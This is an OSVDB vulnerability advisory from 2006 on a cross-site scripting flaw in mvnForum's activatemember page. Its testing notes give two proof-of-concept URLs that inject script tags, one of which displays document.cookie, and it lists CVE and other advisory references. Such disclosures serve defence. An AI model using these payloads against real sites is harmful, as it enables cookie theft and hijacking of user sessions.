mvnForum activatemember Multiple Variable XSS

2006-06-24T12:34:05
ID OSVDB:26833
Type osvdb
Reporter r0t(krustevs@googlemail.com)
Modified 2006-06-24T12:34:05

Description

Manual Testing Notes

/mvnForum/activatemember?activatecode=&member=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/mvnForum/activatemember?activatecode=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Vendor URL: http://www.mvnforum.com/ Secunia Advisory ID:20803 Other Advisory URL: http://pridels.blogspot.com/2006/06/mvnforum-xss-vuln.html FrSIRT Advisory: ADV-2006-2531 CVE-2006-3245 Bugtraq ID: 18663